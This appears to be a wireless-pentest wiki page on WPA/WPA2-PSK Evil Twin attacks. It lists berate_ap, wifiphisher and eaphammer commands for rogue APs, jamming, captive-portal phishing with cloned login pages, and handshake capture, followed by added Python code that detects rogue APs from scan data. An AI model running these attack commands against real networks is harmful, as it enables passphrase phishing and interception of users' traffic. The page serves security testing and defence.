
12. WPA WPA2 Personal (PSK) Rogue AP Evil Twin

Koutto edited this page Nov 1, 2020 · 1 revision
  • Performing an Evil Twin attack with an AP set up with WPA/WPA2 requires knowledge of the target network's passphrase (e.g. at a conference, or a passphrase already cracked...).
  • If the passphrase is unknown, an Evil Twin attack using an Open Network rogue AP can be set up instead (for example to attempt to retrieve the passphrase by phishing via a captive portal attack).

Basic WPA/WPA2-PSK AP

  • With Internet sharing (default):
berate_ap <interface_AP> <interface_internet> <SSID> <passphrase>
  • Without internet sharing:
berate_ap -n <interface_AP> <SSID> <passphrase>
  • Bridged internet sharing (pre-configured bridge interface):
berate_ap -m bridge <interface_AP> <interface_internet> <SSID> <passphrase>
  • Internet sharing from the same WiFi interface:
berate_ap <interface_AP> <interface_AP> <SSID> <passphrase>
  • Enable IEEE 802.11n (with 40MHz):
berate_ap --ieee80211n --ht_capab '[HT40+]' <interface_AP> <interface_internet> <SSID> <passphrase>
  • Enable client isolation:
berate_ap --isolate-clients <interface_AP> <interface_internet> <SSID> <passphrase>

WPA/WPA2-PSK AP Evil Twin + Captive Portal Attack

With wifiphisher:

wifiphisher -aI <interface_rogue_AP> -jI <interface_jamming> --essid <target_SSID> -pK <passphrase> -kN

With eaphammer:

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase <passphrase> --captive-portal  # WPA2 by default

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase <passphrase> --captive-portal --wpa-version 1  # Force WPA1

For best results on phishing:

  • Clone the legitimate page (wget),
  • Copy the cloned web page into the /var/www/html/ directory (eaphammer serves the web page from there according to the default Apache2 configuration).

WPA/WPA2-PSK AP Evil Twin + (Half) WPA Handshake Capture

./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase randompassphrase --capture-wpa-handshakes
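From the defender's side, every rogue AP shape on this page (a WPA2-PSK twin on an unknown BSSID, an Open twin for a captive portal, a twin forced to WPA1) is visible in a wireless scan as the corporate SSID appearing with an unexpected BSSID or security setting. The following inventory check is an added example, not part of the original page or of berate_ap/eaphammer/wifiphisher; the SSIDs, BSSIDs and scan results are constructed sample data.

```python
"""Flag Evil Twin / rogue APs by comparing scan results against an AP inventory."""
from dataclasses import dataclass

# Constructed inventory of legitimate APs: SSID -> expected auth and known BSSIDs
INVENTORY = {
    "CorpWiFi": {"auth": "WPA2-PSK",
                 "bssids": {"00:11:22:33:44:01", "00:11:22:33:44:02"}},
}


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    auth: str  # "OPEN", "WPA-PSK" or "WPA2-PSK" as reported by the scanner


# Constructed scan results (what a site survey tool would report)
SCAN = [
    Beacon("CorpWiFi", "00:11:22:33:44:01", 6, "WPA2-PSK"),   # legitimate AP
    Beacon("CorpWiFi", "AA:BB:CC:DD:EE:FF", 6, "WPA2-PSK"),   # twin using the real passphrase
    Beacon("CorpWiFi", "AA:BB:CC:DD:EE:FE", 1, "OPEN"),       # Open twin (captive portal)
    Beacon("CorpWiFi", "AA:BB:CC:DD:EE:FD", 11, "WPA-PSK"),   # twin forced to WPA1
    Beacon("GuestNet", "12:34:56:78:9A:BC", 3, "OPEN"),       # not our SSID, out of scope
]


def find_rogue_aps(scan, inventory):
    """Return (bssid, reason) findings for beacons that claim one of our SSIDs."""
    findings = []
    for b in scan:
        expected = inventory.get(b.ssid)
        if expected is None:
            continue  # SSID we do not own: nothing to compare against
        bssid = b.bssid.lower()
        if bssid not in expected["bssids"]:
            findings.append((bssid, "unknown BSSID beaconing SSID %s" % b.ssid))
        if b.auth == "OPEN":
            findings.append((bssid, "SSID %s advertised as Open network" % b.ssid))
        elif b.auth != expected["auth"]:
            findings.append((bssid, "auth downgraded from %s to %s"
                             % (expected["auth"], b.auth)))
    return findings


if __name__ == "__main__":
    for bssid, reason in find_rogue_aps(SCAN, INVENTORY):
        print("ROGUE", bssid, reason)
```

The unknown-BSSID rule catches all three twins regardless of passphrase knowledge; the auth rules additionally flag the Open and WPA1 variants even if the attacker spoofs a known BSSID.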